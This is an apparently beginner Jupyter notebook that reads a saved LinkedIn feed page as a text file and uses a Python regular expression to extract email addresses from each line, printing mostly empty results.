"<NAME> commented on this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 3rd+\n",
"Commissioning Manager - Process | Commissioning Expert | Troubleshooting Expert for O&M|\n",
"20h • 20 hours ago\n",
"Riyadh AldhaleaiStatus is reachable\n",
"Riy<NAME>\n",
"• 3rd+\n",
"Manager -Manpower Services at AlMansoori Specialized Engineering\n",
"3d • 3 days ago\n",
"Follow\n",
"small test for your focus\n",
"whats is the Number inside the circle?\n",
"\n",
"Image previewActivate to view larger image\n",
"like\n",
"4\n",
"18 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"<NAME>\n",
"\n",
"\n",
"\n",
"Open Emoji Keyboard\n",
"\n",
"Current selected sort order is Most relevant\n",
"Most relevant\n",
"See profile for Lalit SharmaStatus is reachable\n",
"L<NAME>\n",
" 1st degree connection1st\n",
"Team Leader cum Senior Highway Engineer\n",
"1h\n",
"45283\n",
"\n",
"\n",
"Like\n",
"\n",
"Reply\n",
"\n",
"Load more comments\n",
"Feed post number 5\n",
"Sammeer’s profile photo\n",
"<NAME> loves this\n",
"\n",
"<NAME>, Ph.D\n",
"<NAME>, Ph.D\n",
"• 2nd\n",
"Social Media Marketing|Please click FOLLOW button for the latest development in Civil Engineering || 230K+ Followers ||\n",
"23h • 23 hours ago\n",
"Follow\n",
" What Causes Breakdowns in Traffic Flow?\n",
"\n",
"The layman's definition of congestion is \"too many cars trying to use a highway at the same time\". Transportation engineers formalize this idea as capacity—the ability to move vehicles past a point over a given span of time. When the capacity of a highway section is exceeded, traffic flow breaks down, speeds drop, and vehicles crowd together. These actions cause traffic to back up behind the disruption.\n",
"\n",
"Basically, there are three types of traffic flow behavior that will cause traffic flow to break down:\n",
"\n",
"1- \"Bunching\" of vehicles as a result of reduced speed.\n",
"2- Intended Interruption to Traffic Flow.\n",
"3- Vehicle Merging Maneuvers. \n",
"\n",
"With all this information, I believe this dog got the concept and found the solution better than me as a Highway engineer ;)\n",
"\n",
"If you found the content informative, you may Follow me by <NAME>, Ph.D for more!\n",
"\n",
"Video Credit: IG @ earthdixe\n",
".......................................................................\n",
"All rights and credits are reserved to the respective owner(s). If you are the main copyright owner rather than the one mentioned here of this content, contact me to claim credit or content removal.\n",
"\n",
"Check out #mehrtashsoltani for educational and practical content in civil engineering!\n",
"…see more\n",
"\n",
"Pause\n",
"Back to start of video\n",
"Skip back 10 seconds\n",
"Skip ahead 10 seconds\n",
"Current time 0:04/Duration 0:18\n",
" \n",
"1x\n",
"\n",
"Playback speed\n",
"\n",
"Unmute\n",
"\n",
"Turn fullscreen on\n",
"likelovecelebrate\n",
"3,781\n",
"<NAME> and 3,780 others\n",
"178 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 6\n",
"Supermetrics\n",
"Supermetrics\n",
"13,205 followers\n",
"Promoted\n",
"\n",
"Supermetrics has been listed on G2 as the highest rated marketing data pipeline company of 2022.\n",
"\n",
"Over 17,000 companies already use Supermetrics to streamline marketing reports.\n",
"\n",
"Join our happy customers and start your free trial today!\n",
"…see more\n",
"\n",
"Start your free trial today\n",
"supermetrics.comRegister. View Sponsored Content\n",
"Register\n",
"likelove\n",
"61\n",
"1 comment\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 7\n",
"Samundra’s profile photo\n",
"<NAME> loves this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 2nd\n",
"Here to write. If it goes viral, it's not because of me. It's because it's true.\n",
"3d • 3 days ago\n",
"Follow\n",
"\n",
"No alternative text description for this imageActivate to view larger image\n",
"likelovecelebrate\n",
"68,665\n",
"<NAME> and 68,664 others\n",
"1,154 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"\n",
"Show more results\n",
"Add to your feed\n",
"\n",
"National Association of REALTORS®;<EMAIL> \n",
"National Association of REALTORS®\n",
"Company • Real Estate\n",
"\n",
"Follow\n",
"<NAME>\n",
"<NAME>\n",
"Bestselling Author | Host of the Women & Money Podcast | Co-Founder of SecureSave\n",
"\n",
"Follow\n",
"National Association of Home Builders\n",
"National Association of Home Builders\n",
"Company • Construction\n",
"\n",
"Follow\n",
"View all recommendations \n",
"\n",
"About\n",
"Accessibility\n",
"Help Center\n",
"\n",
"Privacy & Terms \n",
"Ad Choices\n",
"Advertising\n",
"\n",
"Business Services \n",
"Get the LinkedIn app\n",
"More\n",
" LinkedIn Corporation © 2022 <EMAIL> \n",
"<NAME>Status is online\n",
"MessagingYou are on the messaging overlay. Press enter to open the list of conversations.\n",
"\n",
"\n",
"Compose message\n",
"\n",
"You are on the messaging overlay. Press enter to open the list of conversations.\n",
"\n"
]
}
],
"source": [
"\n",
    "f = open(\"C:\\\\Users\\\\super\\\\Downloads\\\\Week 1 Test\\\\websiteData.txt\", \"r\", encoding=\"utf8\")\n",
"print(f.read())"
]
},
{
"cell_type": "code",
"execution_count": 67,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"['<EMAIL>']\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n",
"[]\n"
]
}
],
"source": [
"f = open(\"C:\\\\Users\\\\super\\Downloads\\\\Week 1 Test\\\\websiteData.txt\", \"r\", encoding=\"utf8\")\n",
"\n",
"for line in f:\n",
" \n",
" s = line.strip()\n",
" \n",
" \n",
" reg = re.findall(r\"[A-Za-z0-9._%+-]+\"\n",
" r\"@[A-Za-z0-9.-]+\"\n",
" r\"\\.[A-Za-z]{2,4}\", s)\n",
" \n",
" \n",
" print(reg)\n",
" \n",
" \n"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.8.5"
}
},
"nbformat": 4,
"nbformat_minor": 4
} | emailScrap.py | {
"cells": [
{
"cell_type": "code",
"execution_count": 52,
"metadata": {},
"outputs": [],
"source": [
"import pandas as pd\n",
"import numpy as np\n",
"import re\n",
"import json"
]
},
{
"cell_type": "code",
"execution_count": 37,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"0 notifications total\n",
"\n",
"Skip to search\n",
"\n",
"Skip to main content\n",
"\n",
"Close jump menu\n",
"Search\n",
"Primary Navigation\n",
"Home\n",
"My Network\n",
"<EMAIL> \n",
"Messaging\n",
"13\n",
"13 new notifications\n",
"Notifications\n",
"<NAME>\n",
"Me\n",
"\n",
"Work\n",
"Advertise\n",
"Photo of <NAME>\n",
"<NAME>\n",
"Senior Data Engineer\n",
"\n",
"Who viewed your profile\n",
"238\n",
"Views of your post\n",
"567\n",
"Access exclusive tools & insights\n",
"Retry Premium Free\n",
" My items\n",
"\n",
"Fort Services logo\n",
"Fort Services\n",
"Page notifications\n",
"5\n",
"Page visitors\n",
"1\n",
"See visitor analytics\n",
"Recent\n",
"\n",
"CX Network: Customer Experience, Service, Insight, Digital and Marketing Leaders\n",
"Data Analytics - Big Data • BI • SQL • Power BI • Tableau • RPA • Python • ML • AI • Azure • DevOps\n",
"Oracle Retail Q&A\n",
"Oracle Retail Analytics Professional\n",
"Use it or Lose it: Data Science Best Practices to Leverage AI/ML\n",
"GroupsSee all Groups\n",
"\n",
"CX Network: Customer Experience, Service, Insight, Digital and Marketing Leaders\n",
"Data Analytics - Big Data • BI • SQL • Power BI • Tableau • RPA • Python • ML • AI • Azure • DevOps\n",
"Oracle Retail Q&AShow more Show more Groups\n",
"EventsSee all Events Contact: <EMAIL> \n",
"\n",
"\n",
"Havard Business School - Startup Demo DaySee allSee all Events\n",
"Followed HashtagsSee all Followed Hashtags\n",
"Discover more\n",
"Visit profile for Rabindra Kharel\n",
"\n",
"Start a post\n",
"\n",
"Photo\n",
"\n",
"Video\n",
"Event\n",
"\n",
"Write article\n",
"\n",
"Sort by:\n",
"Top\n",
"Feed Updates\n",
"Feed post number 1\n",
"kshitij’s profile photo\n",
"<NAME> commented on this\n",
"\n",
"Anup NepalStatus is reachable\n",
"Anup Nepal\n",
"• 1st\n",
"Digital Transformation\n",
"7h • 7 hours ago\n",
"I’m happy to share that I’m starting a new position as Retail Optimization Lead at Tango Energy!\n",
"\n",
"Starting a New Position\n",
"likecelebrate\n",
"27\n",
"<NAME> and 26 others\n",
"8 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"<NAME>\n",
"\n",
"\n",
"\n",
"Open Emoji Keyboard\n",
"\n",
"Current selected sort order is Most relevant\n",
"Most relevant\n",
"<EMAIL> \n",
" 1st degree connection1st\n",
"Software Engineer\n",
"2h\n",
"Congrats bro!\n",
"\n",
"\n",
"Like\n",
"\n",
"Reply\n",
"\n",
"Load more comments\n",
"Feed post number 2\n",
"<NAME> follows Hevo Data\n",
"\n",
"Hevo Data\n",
"Hevo Data\n",
"33,425 followers\n",
"Promoted\n",
"There is an easier way to perform Redshift ETL.\n",
"\n",
"Find out how you can save time on engineering and research to set-up Redshift ETL with our cheatsheet.\n",
"…see more\n",
"\n",
"Free guide to Redshift ETL\n",
"hevodata.com\n",
"\n",
"Download. View Sponsored Content\n",
"Download\n",
"like\n",
"40\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"\n",
"Be the first to comment on this\n",
"\n",
"Feed post number 3\n",
"Profile images for several LinkedIn members\n",
"Profile images for several LinkedIn membersProfile images for several LinkedIn members\n",
"<NAME> and <NAME> like this\n",
"\n",
"<NAME>Status is reachable\n",
"<NAME>\n",
"• 1st\n",
"Software Engineer\n",
"2d • 2 days ago\n",
"Just finished the course “Communicating with Confidence” by <NAME>! Check it out: https://lnkd.in/ejtCuJMK #publicspeaking #wellness.\n",
"\n",
"Certificate of Completion\n",
"linkedin.com • 1 min read\n",
"like\n",
"10\n",
"<NAME> and 9 others\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"\n",
"Be the first to comment on this\n",
"\n",
"Feed post number 1\n",
"Aayush AdhikariStatus is online\n",
"<NAME>\n",
"• 1st\n",
"Machine Learning Data Scientist at DeepMind Creations Pvt Ltd\n",
"8h • Edited • 8 hours ago\n",
"\n",
"Hello all our company is opening for PAID INTERNSHIP on Flutter. If you are interested plz send your CV at <EMAIL>\n",
"\n",
"#flutter\n",
"#flutterdeveloper\n",
"#ml\n",
"#ai\n",
"…see more\n",
"likesupport\n",
"12\n",
"1 comment\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 2\n",
"Jobs recommended for you\n",
"\n",
"View job: Senior Data Engineer\n",
"\n",
"Recruiting from Scratch\n",
"Senior Data Engineer\n",
"Recruiting from Scratch\n",
"Vancouver, British Columbia, Canada\n",
"\n",
"1 month ago\n",
"View job: Senior Data Engineer - Scala/AWS\n",
"\n",
"Jobot\n",
"Senior Data Engineer - Scala/AWS\n",
"Jobot\n",
"Vancouver, British Columbia, Canada\n",
"\n",
"1 week ago • Easy Apply\n",
"View job: Senior Big Data Engineer\n",
"\n",
"Emonics LLC\n",
"Senior Big Data Engineer\n",
"Emonics LLC\n",
"Vancouver, British Columbia, Canada\n",
"send email to <EMAIL> \n",
"\n",
"3 days ago • Easy Apply\n",
"\n",
"See moreSee more\n",
"Feed post number 3\n",
"Santosh’s profile photo\n",
"Santosh Pandey likes this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 3rd+\n",
"☀️ Solving for Future of Work | People Engagement\n",
"3d • 3 days ago\n",
"Follow\n",
"Hypocrisy 101\n",
"\n",
"\"How soon can you join? We need somebody who can join within a week.\"\n",
"\n",
"\"You'll need to serve 3 months of notice period, we can't do anything about it.\"\n",
"\n",
"If the employee is so important to you that you need 3 months to replace them, you should've treated them well in the first place - and they probably wouldn't have left.\n",
"\n",
"A smooth exit process is underrated.\n",
"\n",
"Do it well, and the employee might consider returning in the future.\n",
"\n",
"Make it complicated, and the employee will ensure that none of their friends/acquaintances ends up joining your company ever again. 🙃\n",
"\n",
"Curious, how was your exit process in your previous org?\n",
"\n",
"#noticeperiod #offboarding #employeeexperience\n",
"…see more\n",
"\n",
"No alternative text description for this imageActivate to view larger image\n",
"likecelebratesupport agent <EMAIL> \n",
"1,420\n",
"<NAME> and 1,419 others\n",
"87 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 4\n",
"<NAME>, <NAME> and 136 other connections follow The British College, Kathmandu\n",
"\n",
"The British College, Kathmandu\n",
"The British College, Kathmandu\n",
"4,662 followers\n",
"Promoted\n",
"TBC is proud to announce the second series of the TBC Distinguished Guest Lecture Series with Prof <NAME> & Dr <NAME>. The topic of the session: \"Innovation, Development & Covid 19: Post Pandemic Context for Nepal.\"\n",
"RSVP: https://bit.ly/33jYiV1\n",
"…see more\n",
"No alternative text description for this image\n",
"TBC Distinguished Guest Lecture Series II\n",
"Apply Now. View Sponsored Content\n",
"Apply Now\n",
"No alternative text description for this image\n",
"TBC Distinguished Guest Lecture Series II\n",
"Apply Now. View Sponsored Content\n",
"Apply Now\n",
"No alternative text description for this image\n",
"TBC Distinguished Guest Lecture Series II\n",
"Apply Now. View Sponsored Content\n",
"Apply Now\n",
"\n",
"like\n",
"25\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"\n",
"Be the first to comment on this\n",
"\n",
"Feed post number 5\n",
"Congratulate <NAME> on their work anniversary\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 1st\n",
"CEO and Founder at SoftNEP\n",
"1d1 day ago\n",
"Celebrating 17 years at SoftNEP Pvt Ltd\n",
"celebratelike\n",
"2\n",
"\n",
"Congrats Sunil\n",
"\n",
"Time flies!\n",
"\n",
"Kudos to you\n",
"\n",
"Wow!\n",
"\n",
"What an achievement!\n",
"\n",
"Great work!\n",
"\n",
"Wow, 17 years already?\n",
"\n",
"Scroll right\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"<NAME>\n",
"\n",
"\n",
"\n",
"Open Emoji Keyboard\n",
"\n",
"Feed post number 6\n",
"Lekhanath’s profile photo\n",
"<NAME> commented on this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 3rd+\n",
"Director, Eurest\n",
"3d • 3 days ago\n",
"I am looking to fill the following jobs:\n",
"<NAME>\n",
"<NAME>\n",
"Prep Cook\n",
"\n",
"Monday-Friday\n",
"<NAME>\n",
"PM me for details\n",
"…see more\n",
"likelove\n",
"166\n",
"132 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"<NAME>\n",
"\n",
"\n",
"\n",
"Open Emoji Keyboard\n",
"\n",
"Current selected sort order is Most relevant\n",
"Most relevant\n",
"See profile for Lekhanath BhandariStatus is reachable\n",
"<NAME>\n",
" 1st degree connection1st\n",
"sous chef at fazlani nature nest\n",
"1d\n",
"Interested for sous chef\n",
"\n",
"\n",
"Like\n",
"\n",
"Reply\n",
"\n",
"Load more comments\n",
"Feed post number 7\n",
"Bibek’s profile photo\n",
"<NAME> likes this\n",
"\n",
"<NAME>Status is reachable\n",
"<NAME>\n",
"• 2nd\n",
"CEO, Innovation and Growth at Trinity Consulting - Founder, InfluencerActive, the World's First B2B Influencer Marketplace\n",
"12h • 12 hours ago\n",
"Follow\n",
"Turn your plants into pets!\n",
"\n",
"Play\n",
"Back to start of video\n",
"Skip back 10 seconds\n",
"Skip ahead 10 seconds\n",
"Current time 0:00/Duration 0:45\n",
" \n",
"1x\n",
"\n",
"Playback speed\n",
"\n",
"Unmute\n",
"\n",
"Turn fullscreen on\n",
"likeloveinsightful\n",
"9,044\n",
"<NAME> and 9,043 others\n",
"257 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 1\n",
"Larange’s profile photo\n",
"<NAME> likes this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 2nd\n",
"Research Scientist at Google DeepMind • Advisor at AlphaSignal.ai\n",
"1d • Edited • 1 day ago\n",
"Follow\n",
"Hi all!\n",
"We're currently looking for a part time (4 hours/week) Computer Science PhD or Masters student to help us at https://alphasignal.ai\n",
"\n",
"A few criteria:\n",
"-Must be between timezones GMT+5 (India) to GMT+9 (Japan).\n",
"-Published at least one research paper in Machine Learning.\n",
"-Has some familiarity with Pytorch, Tensorflow.\n",
"-Knows the difference between RNN, CNN, LSTM, GANs.\n",
"-Familiarity with Deep Learning terms.\n",
"-Knows about Meta AI, Deepmind, Google AI, OpenAI and other big players.\n",
"\n",
"That's it!\n",
"If you know a student who fits the role send it my way :)\n",
"\n",
"It's definitely a resume-booster.\n",
"…see more\n",
"likesupportcurious\n",
"432\n",
"<NAME> and 431 others\n",
"102 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 2\n",
"<NAME> and <NAME> follow Spot by NetApp\n",
"\n",
"Spot by NetApp\n",
"Spot by NetApp\n",
"11,440 followers\n",
"Promoted\n",
"Download our free digital guide to Microsoft Azure. Learn best practices for architecting and managing efficient, scalable cloud infrastructure built to accelerate your business\n",
"…see more\n",
"\n",
"Getting Started with Azure Cloud Infrastructure – Get the PDF Guide\n",
"get.spot.io\n",
"\n",
"Download. View Sponsored Content\n",
"Download\n",
"like\n",
"30\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"\n",
"Be the first to comment on this\n",
"\n",
"Feed post number 3\n",
"Everest’s profile photo\n",
"Everest K.C. likes this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 2nd\n",
"System Administrator\n",
"6h • Edited • 6 hours ago\n",
"<NAME> is an extremely experienced DevOps engineer. He has an intelligent teaching method, Start teaching from the very basics to taking to a stage where you build real-world solutions and debug challenges. The designed labs were great and worked as expected without a hitch. Thanks, owlocular to give me this certificate.\n",
"…see more\n",
"Your document has finished loading\n",
"likecelebratelove\n",
"6\n",
"Everest K.C. and 5 others\n",
"1 comment\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"Feed post number 4\n",
"Lalit’s profile photo\n",
"<NAME> commented on this\n",
"\n",
"<NAME>\n",
"<NAME>\n",
"• 3rd+\n",
"Commissioning Manager - Process | Commissioning Expert | Troubleshooting Expert for O&M|\n",
"20h • 20 hours ago\n",
"Riyadh AldhaleaiStatus is reachable\n",
"Riy<NAME>\n",
"• 3rd+\n",
"Manager -Manpower Services at AlMansoori Specialized Engineering\n",
"3d • 3 days ago\n",
"Follow\n",
"small test for your focus\n",
"whats is the Number inside the circle?\n",
"\n",
"Image previewActivate to view larger image\n",
"like\n",
"4\n",
"18 comments\n",
"\n",
"Like\n",
"\n",
"Comment\n",
"\n",
"Share\n",
"\n",
"Send\n",
"<NAME>\n",
"\n",
"\n",
"\n",
"Open Emoji Keyboard\n",
"\n",
"Current selected sort order is Most relevant\n",
"Most relevant\n",
"See profile for Lalit SharmaStatus is reachable\n",
"L<NAME>\n",
" 1st degree connection1st\n",
"Team Leader cum Senior Highway Engineer\n",
"1h\n",
"45283\n",
"\n",
"\n",
"Like\n",
